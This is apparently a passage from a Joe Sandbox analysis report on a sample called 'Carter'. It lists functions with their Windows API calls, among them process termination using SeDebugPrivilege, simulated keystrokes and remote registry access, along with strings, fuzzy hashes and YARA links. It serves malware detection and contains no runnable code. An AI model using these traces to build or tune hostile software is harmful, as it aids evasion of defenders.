Instruction Fuzzy Hash: AA51B334680205BEEF319B258C8DB5D7B64AB15320F248511FB28E71E1CF71AA589B54

Function 00BF2F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00C2C638
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C2C65A
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C2C672
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00C2C690
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C2C6B1
DestroyIcon.USER32(00000000), ref: 00C2C6C0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C2C6DD
DestroyIcon.USER32(?), ref: 00C2C6EC

Part of subcall function 00C7AAD4: DeleteObject.GDI32(00000000), ref: 00C7AB0D

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 1a69116d9272abbc50c54f2d7f346c5cfe8dd81616f432043151c7fc92266c0e
Instruction ID: b00c4e269c9348ddc5f8222d74fadbc58cdafcf7ce0b8e3fce60606d06330842
Opcode Fuzzy Hash: 1a69116d9272abbc50c54f2d7f346c5cfe8dd81616f432043151c7fc92266c0e
Instruction Fuzzy Hash: A4518870610209AFDB20DF24DC85BAE7BF5EB48710F204668FA12A7690DB71AD94DB50

Function 00C4A226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C4B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C4B54D
Part of subcall function 00C4B52D: GetCurrentThreadId.KERNEL32 ref: 00C4B554
Part of subcall function 00C4B52D: AttachThreadInput.USER32(00000000,?,00C4A23B,?,00000001), ref: 00C4B55B

MapVirtualKeyW.USER32(00000025,00000000), ref: 00C4A246
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C4A263
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C4A266
MapVirtualKeyW.USER32(00000025,00000000), ref: 00C4A26F
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C4A28D
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C4A290
MapVirtualKeyW.USER32(00000025,00000000), ref: 00C4A299
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C4A2B0
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C4A2B3

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: f7381f2f8e4898d644abfc3c6bde628c81b836b5c4fb898c6a901b8423e83555
Instruction ID: eaa9373c0c3c18018422c1cd449fd46a2f045de95a01dc1a1c75632aa5cba3ac
Opcode Fuzzy Hash: f7381f2f8e4898d644abfc3c6bde628c81b836b5c4fb898c6a901b8423e83555
Instruction Fuzzy Hash: D311E1B1950618BEF6106F609C8AF6E7B2DEB4C761F210419F7446B0D0CAF36C50ABA8

Function 00C494D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00C4915A,00000B00,?,?), ref: 00C494E2
HeapAlloc.KERNEL32(00000000,?,00C4915A,00000B00,?,?), ref: 00C494E9
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C4915A,00000B00,?,?), ref: 00C494FE
GetCurrentProcess.KERNEL32(?,00000000,?,00C4915A,00000B00,?,?), ref: 00C49506
DuplicateHandle.KERNEL32(00000000,?,00C4915A,00000B00,?,?), ref: 00C49509
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00C4915A,00000B00,?,?), ref: 00C49519
GetCurrentProcess.KERNEL32(00C4915A,00000000,?,00C4915A,00000B00,?,?), ref: 00C49521
DuplicateHandle.KERNEL32(00000000,?,00C4915A,00000B00,?,?), ref: 00C49524
CreateThread.KERNEL32(00000000,00000000,00C4954A,00000000,00000000,00000000), ref: 00C4953E

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 2fb07ca966ae20d229b5be0a05b573dda0a77108265c51c5bc4921d5c5b4f58f
Instruction ID: fad0ba09955772c408e5dea5e4dc59e7ac681940de5296d33e419f8ad39e2b40
Opcode Fuzzy Hash: 2fb07ca966ae20d229b5be0a05b573dda0a77108265c51c5bc4921d5c5b4f58f
Instruction Fuzzy Hash: CF01BBB6240304BFE750ABA5DC8DF6F7BACEB89711F104411FA05DB1A1DA709C04CB24

Function 00C6A20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00C6A265
NULL Pointer assignment, xrefs: 00C6A28E, 00C6A5B2

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: fda136edf180d34203c33b24fddd7b612b7d5ebd08f51c47379b4839b95650da
Instruction ID: 4ab61e142675ce10587f00b3a4ef8d79944e130694d1a6fe929ea7f9f8b3eaad
Opcode Fuzzy Hash: fda136edf180d34203c33b24fddd7b612b7d5ebd08f51c47379b4839b95650da
Instruction Fuzzy Hash: 9AC19171A0021A9FDF24CF98C884AAEB7B5FF48314F148469E916B7281E770DE45CF51

Function 00C697FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C69851
VariantInit.OLEAUT32(?), ref: 00C69922
VariantInit.OLEAUT32(?), ref: 00C69A23
VariantClear.OLEAUT32(?), ref: 00C69A2D
VariantClear.OLEAUT32(?), ref: 00C69A8A

Strings

Null Object assignment in FOR..IN loop, xrefs: 00C698B2, 00C699E0, 00C69A98
Incorrect Object type in FOR..IN loop, xrefs: 00C69A06

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: eb4e18803ea9c0967feea6e411689b49dee5f982588b919991da2e85df0fd262
Instruction ID: a71a0167588cf5639789652cf88f75153a10623b47b6da2ca29d6474240cc68c
Opcode Fuzzy Hash: eb4e18803ea9c0967feea6e411689b49dee5f982588b919991da2e85df0fd262
Instruction Fuzzy Hash: 08918E71A00219ABDF24CFA5D884FAEBBB8EF45714F10855DF529AB281D7709A44CFA0

Function 00C773A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C77449
SendMessageW.USER32(?,00001036,00000000,?), ref: 00C7745D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C77477
_wcscat.LIBCMT ref: 00C774D2
SendMessageW.USER32(?,00001057,00000000,?), ref: 00C774E9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C77517

Strings

SysListView32, xrefs: 00C7741B

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 3b270f38b2b6325c6627122234b102be76ef2157bc2415789336b38c21d0fe34
Instruction ID: 5192ff45cad584e866eb553fe53a319600ab8448a84e717efae35255508d1fac
Opcode Fuzzy Hash: 3b270f38b2b6325c6627122234b102be76ef2157bc2415789336b38c21d0fe34
Instruction Fuzzy Hash: 4F41B47190430CAFEF219F64CC85BEE77A8EF08354F10856AF958A71D1D6719D84DB50

Function 00C6F01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00C54148: CreateToolhelp32Snapshot.KERNEL32 ref: 00C5416D
Part of subcall function 00C54148: Process32FirstW.KERNEL32(00000000,?), ref: 00C5417B
Part of subcall function 00C54148: CloseHandle.KERNEL32(00000000), ref: 00C54245

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C6F08D
GetLastError.KERNEL32 ref: 00C6F0A0
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C6F0CF
TerminateProcess.KERNEL32(00000000,00000000), ref: 00C6F14C
GetLastError.KERNEL32(00000000), ref: 00C6F157
CloseHandle.KERNEL32(00000000), ref: 00C6F18C

Strings

SeDebugPrivilege, xrefs: 00C6F0AB

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 713a9e5eb39b77fc765bcc4a6f18cf60c41434a7e5748e13988d9e0ee9ab1847
Instruction ID: e16ae37d8789441c45c22b919cae551d51810b2264c2c543a7d2b83fa85b3a92
Opcode Fuzzy Hash: 713a9e5eb39b77fc765bcc4a6f18cf60c41434a7e5748e13988d9e0ee9ab1847
Instruction Fuzzy Hash: FD41B9312002019FDB25EF24DCE5F6EB7A1AF80714F14846DF9469B2D2CB70AD4ADB95

Function 00C534DD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00C5357C

Strings

question, xrefs: 00C53535
info, xrefs: 00C5351D
warning, xrefs: 00C53565
stop, xrefs: 00C5354D
blank, xrefs: 00C534FE

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 626c428662220c2d3afeeb038e32d2e36758c256f339c457fbf54f3c15352bc9
Instruction ID: 5b1892f1fef4307a372d6901277d4264aab26cf10c44b024f3a0d3196964fd07
Opcode Fuzzy Hash: 626c428662220c2d3afeeb038e32d2e36758c256f339c457fbf54f3c15352bc9
Instruction Fuzzy Hash: 26112E356483C77EA7004A15DC92DAE77ACDF063E5BB01029FE1056182F7646FC466AC

Function 00C547E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C54802
LoadStringW.USER32(00000000), ref: 00C54809
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C5481F
LoadStringW.USER32(00000000), ref: 00C54826
_wprintf.LIBCMT ref: 00C5484C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C5486A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00C54847

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: f6176da1b25cd6da0a2723e869a5aaadce812839ff7cda0da2304b6cff0d74b0
Instruction ID: 020e4e6da5336bdda166b80751cac5c638b8f2c0cde04b397291d962f75ce969
Opcode Fuzzy Hash: f6176da1b25cd6da0a2723e869a5aaadce812839ff7cda0da2304b6cff0d74b0
Instruction Fuzzy Hash: 460167F69003487FE75197909D89FFE736CEB08305F500595BB49E2041E6745E884B79

Function 00C7DB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BF29F3

GetSystemMetrics.USER32(0000000F), ref: 00C7DB42
GetSystemMetrics.USER32(0000000F), ref: 00C7DB62
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00C7DD9D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C7DDBB
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C7DDDC
ShowWindow.USER32(00000003,00000000), ref: 00C7DDFB
InvalidateRect.USER32(?,00000000,00000001), ref: 00C7DE20
DefDlgProcW.USER32(?,00000005,?,?), ref: 00C7DE43

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: f2883bd6769227a2c6af02f910d443e179baaeae6ea264ef680c731629014a83
Instruction ID: 57d552827d4ca030a8c39bffdfb2cfd93fb4a7e9549b026af2802de4bcf5660d
Opcode Fuzzy Hash: f2883bd6769227a2c6af02f910d443e179baaeae6ea264ef680c731629014a83
Instruction Fuzzy Hash: 29B1A830600225EFCF15CF69C9857AE7BB1FF44701F18C169EC5AAE295D771AA90CBA0

Function 00C70371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

Part of subcall function 00C7147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7040D,?,?), ref: 00C71491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C7044E

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: 145a48cfb1f3d610b9c916ee4f7792de1793bd2cc30a57ff16385a0806d6d36e
Instruction ID: 4396012fd23e2969a5b066076334e7b060e3af5877497c8166b7470a073b1367
Opcode Fuzzy Hash: 145a48cfb1f3d610b9c916ee4f7792de1793bd2cc30a57ff16385a0806d6d36e
Instruction Fuzzy Hash: EEA16B70204201DFC711EF24C891B2EB7E5BF84314F28891DF99A972A2DB31EA45DF46

Function 00BF2E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C2C508,00000004,00000000,00000000,00000000), ref: 00BF2E9F
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00C2C508,00000004,00000000,00000000,00000000,000000FF), ref: 00BF2EE7
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00C2C508,00000004,00000000,00000000,00000000), ref: 00C2C55B
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C2C508,00000004,00000000,00000000,00000000), ref: 00C2C5C7

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 9b5d7e83a47d474d6d22273695b0963f968fc76f6ed5d0cc20c5af76c44996ab
Instruction ID: af2114e1d5b2a1bdd8113c811bf6b1a2cb796cc87e00ee39c1ea3556905fac7e
Opcode Fuzzy Hash: 9b5d7e83a47d474d6d22273695b0963f968fc76f6ed5d0cc20c5af76c44996ab
Instruction Fuzzy Hash: 1B4127346046889ACB358B28D8C877E7BD2FB95300F34849DEA47479A0C775E948E711

Function 00C57681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00C57698

Part of subcall function 00C10FE6: std::exception::exception.LIBCMT ref: 00C1101C
Part of subcall function 00C10FE6: __CxxThrowException@8.LIBCMT ref: 00C11031

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00C576CF
EnterCriticalSection.KERNEL32(?), ref: 00C576EB
_memmove.LIBCMT ref: 00C57739
_memmove.LIBCMT ref: 00C57756
LeaveCriticalSection.KERNEL32(?), ref: 00C57765
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00C5777A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00C57799

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: cb773e099ac6fcb7b0cecec745243fbca7a87d35171fa7548b47652ced192f4f
Instruction ID: 76997c96079cf110be6486e3093392151150f3133db5299d7b84c30f53bf902a
Opcode Fuzzy Hash: cb773e099ac6fcb7b0cecec745243fbca7a87d35171fa7548b47652ced192f4f
Instruction Fuzzy Hash: EF31A135904104EBCB50EF94DC85EAEB7B8EF49310F2441A5FD04AB256D7709E94EBA4

Function 00C767F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00C76810
GetDC.USER32(00000000), ref: 00C76818
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C76823
ReleaseDC.USER32(00000000,00000000), ref: 00C7682F
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C7686B
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C7687C
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C7964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00C768B6
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C768D6

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 9c3cda2416c8ca935e57372730c9eb0b7877d6dbd4ad0c97231887efebfa5afa
Instruction ID: 5c83e7b7fa32b81c0b443f55c9bbe32e4ba6ec7ddd21b37524609253e5408468
Opcode Fuzzy Hash: 9c3cda2416c8ca935e57372730c9eb0b7877d6dbd4ad0c97231887efebfa5afa
Instruction Fuzzy Hash: CB318972201610BFEB108F10CC8AFEA3BA9EF49761F044065FE08AA292D7759C51CBB4

Function 00C4C748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00C4C75D
_memcmp.LIBCMT ref: 00C4C77F
_memcmp.LIBCMT ref: 00C4C797
_memcmp.LIBCMT ref: 00C4C7AA
_memcmp.LIBCMT ref: 00C4C7C4
_memcmp.LIBCMT ref: 00C4C7D7
_memcmp.LIBCMT ref: 00C4C7EF
_memcmp.LIBCMT ref: 00C4C80A

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 5c28ffac9dace147e0447a2a56db9ddb28b3875f8e04b374cc1818d2139c9db1
Instruction ID: c5db41b9e811dc35c4f578dfac801b778158dbb47f6cebd96eba63be8bbe1fc3
Opcode Fuzzy Hash: 5c28ffac9dace147e0447a2a56db9ddb28b3875f8e04b374cc1818d2139c9db1
Instruction Fuzzy Hash: 5421D7727022057B9244B5118DC2FAF376CFE21B98B084124FE16A6252E715DF11E6A9

Function 00C5F166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00BF4D37: __itow.LIBCMT ref: 00BF4D62
